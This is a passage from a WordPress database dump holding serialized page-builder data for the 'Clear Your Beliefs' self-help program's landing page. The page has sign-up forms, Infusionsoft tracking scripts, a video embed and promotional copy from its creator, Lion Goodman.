Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1405, 1844, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1331:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big> <br> A 7-week journey into your subconscious mind to delete the beliefs that hold you back. </p>\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1406, 1845, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1451:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big></p>\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your subconscious mind to delete the beliefs that hold you back.</p>\n\n<form class="infusion-form rd-form-1 3rd-rd-form-1" style="position: relative; bottom: -23px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:525:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1407, 1846, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" 